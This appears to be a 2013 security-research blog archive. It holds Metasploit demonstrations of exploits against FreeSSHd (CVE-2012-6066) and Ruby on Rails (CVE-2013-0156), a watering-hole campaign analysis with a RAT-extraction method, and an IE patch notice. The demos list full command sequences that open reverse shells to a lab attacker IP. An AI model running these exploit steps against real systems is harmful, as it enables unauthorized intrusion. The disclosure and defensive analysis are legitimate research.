Yearly Archives: 2013

CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability initially discovered by Aris the 2010-08-11
PoC provided by kcope the 2012-12-01
Metasploit PoC provided the 2013-01-13

PoC provided by :

kcope
Aris
Daniele Martini

Reference(s) :

CVE-2012-6066
OSVDB-88006
BID-56785
Full Disclosure 2012
Full Disclosure 2010

Affected version(s) :

Freesshd version 1.2.6 and prior

Tested on Windows XP SP3 with :

Freesshd 1.2.4

Description :

This module exploits a vulnerability found in FreeSSHd 1.2.6 or previous to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.

Commands :

use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.178.22
run

use exploit/windows/ssh/freesshd_authbypass
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Watering Hole Campaign Use Latest Java and IE Vulnerabilities

Reverse Engineering, , , , , , , , , , , , , , , , , , , , , , , , , ,

Through a collaboration with (Jindrich Kubec (@Jindroush), Director of Threat Intelligence at avast! / Eric Romang (@eromang), independent security researcher), we can confirm that the watering hole campaigns are still ongoing, targeting multiple web high value web sites, including as example a major Hong Kong political party. We can also confirm that a second major Hong Kong political party is victim of this watering hole campaign.

This website is actually using the new version of the original Internet Explorer (CVE-2012-4792) vulnerability attack, patched in MS13-008, but right now it’s also using the latest Java (CVE-2013-0422) vulnerability, patched in Oracle Java 7 Update 11.

We will provide you further details on the affected web sites after their cleaning.

Chinese language version of the targeted web site is doing a remote javascript inclusion to “hxxp://www.[REDACTED].org/board/data/m/m.js“.

malicious-javascript-inclusion

This website is a legitimate compromised website used for hosting the exploit files, hosted in South Korea.

This include file uses the well-known “deployJava” function, aka “deployJava.js“, and creates a cookie “Somethingeeee” with one day expiration date. This cookie is quite strange and it’s also possible to find it in years old exploits, which suggests this is only a part of greater, long-going operation.

mt.html-file-2

If Internet Explorer 8 is used , an iframe is load from”hxxp://www.[REDACTED].org/board/data/m/mt.html” file. Otherwise and if Oracle Java is detected, an iframe will load “hxxp://www.[REDACTED].org/board/data/m/javamt.html“.

Analysis of “mt.html

mt.html” (d85e34827980b13c9244cbcab13b35ea) file is an obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792, fixed in MS13-008 and provided by Microsoft Monday morning.

https://www.virustotal.com/file/58588ce6d0a1e042450946b03fa4cd92ac1b4246cb6879a7f50a0aab2a84086a/analysis/ (avast detects this code as JS:Bogidow-A [Expl] through Script Shield component).

Comparing to the original CFR and Capstone Turbine versions, this code is not targeting certain browser supported language, but the code is based on the version used on CFR with “boy” and “girl” patterns.

Traditional “today.swf” has been replaced with “logo1229.swf” (da0287b9ebe79bee42685510ac94dc4f), “news.html” has been replaced with “DOITYOUR02.html” (cf394f4619db14d335dde12ca9657656) and “robots.txt” has been replaced with “DOITYOUR01.txt” (a1f6e988cfaa4d7a910183570cde0dc0). The traditional dropper “xsainfo.jpg” is now embedded in the “mt.html” file and obfuscated in the Javascript.

The executable file can be extracted from the string by cutting of first 13 characters, converting hex chars to binary and xoring the whole binary blob with 0xBF. Resulting file with SHA256 CE6C5D2DCF5E9BDECBF15E95943F4FFA845F8F07ED2D10FD6E544F30A9353AD2 is RAT which is communicating with a domain hosted in Hong Kong by New World Telecom.

Analysis of “javamt.html

javamt.html” (b32bf36160c7a3cc5bc765672f7d6f2c) is checking if Oracle Java 7 is present, if yes latest Java vulnerability, CVE-2013-0422, will be executed through “AppletHigh.jar” (521eab796271254793280746dbfd9951). If Oracle Java 6 is present, “AppletLow.jar” (2062203f0ecdaf60df34b5bdfd8eacdc) will exploit CVE-2011-3544. Both these applets contain the very same binary mentioned above (unencrypted).

javamt.html-file

Conclusion

As you see, the watering hole campaign still continues, but has evolved in form but also by using the latest Oracle Java vulnerability. There is just one advise: patch, patch, patch… and see you soon.

MS13-008 Patch Internet Explorer CVE-2012-4792 0day Vulnerability

Vulnerability Management, , , , , , , ,

As announced yesterday, in an advanced notification, Microsoft has release an out-of-band patch MS13-008 to fix the an Internet Explorer 0day , CVE-2012-4792, discovered exploited in targeted attacks against different organizations like Council on Foreign Relations (CFR.org), a foreign policy web group.

This vulnerability was acknowledged by Microsoft, in MSA-2794220, the 30 December, but was exploited in targeted attacks since minimum beginning December. Two weeks after the acknowledge, the patch is out and will fix this vulnerability in Internet Explorer 6, 7 and 8. So just, patch, patch, patch until the next Internet Explorer 0day found exploited in targeted attacks… See you in two or three months.

CVE-2013-0156 Ruby on Rails XML Processor YAML Vulnerability Metasploit Demo

Exploits, Metasploit, , ,

Timeline :

Vulnerability discovered and reported to vendor by numerous people
Coordinated public release of the vulnerability the 2013-01-08
Metasploit PoC provided the 2013-01-09

PoC provided by :

charliesome
espes
lian
hdm

Reference(s) :

CVE-2013-0156
Exploiting Ruby on Rails with Metasploit (CVE-2013-0156)

Affected version(s) :

All versions of RoR (Ruby on Rails) previous versions 3.2.11, 3.1.10, 3.0.19 and 2.3.15

Tested on Centos 6.3 i386 with :

RoR 3.2.10
passenger 3.0.19
GrayLog2 0.9.6

Description :

This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated.

Commands :

use auxiliary/scanner/http/rails_xml_yaml_scanner
set RHOSTS 192.168.21.124
set VHOST rails.zataz.loc
run

use exploit/multi/http/rails_xml_yaml_code_exec
set RHOST 192.168.21.124
set VHOST rails.zataz.loc
set PAYLOAD ruby/shell_reverse_tcp
set LHOST 192.168.21.169
exploit

id
uname -a